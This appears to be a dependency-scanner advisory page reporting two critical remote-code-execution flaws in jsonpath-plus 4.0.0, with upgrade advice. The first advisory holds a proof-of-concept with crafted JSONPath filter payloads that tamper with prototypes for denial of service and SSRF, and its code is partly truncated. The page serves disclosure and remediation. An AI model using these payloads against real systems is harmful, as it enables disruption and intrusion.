Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: jsonpath-plus
- Introduced through: jsonpath-plus@4.0.0
Detailed paths
Introduced through: @lpezet/etl-js@lpezet/etl-js#3a5aa33d39e886f78d090c23ca13ba9fc2cfe144 › jsonpath-plus@4.0.0Remediation: Upgrade to jsonpath-plus@10.2.0.
jsonpath-plus is an A JS implementation of JSONPath with some additional operators
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of vm
in Node.
There were several attempts to fix it in versions 10.0.0-10.1.0 but it could still be exploited using different payloads.
const { JSONPath } = require("jsonpath-plus");
const pathDoS =
"$[?(con = constructor; dp = con.defineProperty; gopd = con.getOwnPropertyDescriptor; f = gopd(con, 'entries').value; alt = gopd(con.getPrototypeOf(f), 'apply'); dp(con.getPrototypeOf(_$_root.body), 'toString', alt);)]";
const pathSsrf =
"$[?(con = constructor; dp = con.defineProperty; dp(con.prototype, 'referrer', _$_root.referrer); dp(con.prototype, 'method', _$_root.method); dp(con.prototype, 'body', _$_root.body);)]";
const result = JSONPath({
json: {
referrer: {
value: "http://authorized.com",
writable: true,
method: {
value: "POST",
writable: true,
body: {
value: "Hello, World!",
writable: true,
path: pathDoS,
result.toString(); //DoS
//fetch("http://localhost:3000"); // ssrf with possible privilege escalation via lateral movement
Upgrade jsonpath-plus
to version 10.2.0 or higher.
critical severity
- Vulnerable module: jsonpath-plus
- Introduced through: jsonpath-plus@4.0.0
Detailed paths
Introduced through: @lpezet/etl-js@lpezet/etl-js#3a5aa33d39e886f78d090c23ca13ba9fc2cfe144 › jsonpath-plus@4.0.0Remediation: Upgrade to jsonpath-plus@10.3.0.
jsonpath-plus is an A JS implementation of JSONPath with some additional operators
Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe'
This is caused by an incomplete fix for CVE-2024-21534.
Upgrade jsonpath-plus
to version 10.3.0 or higher.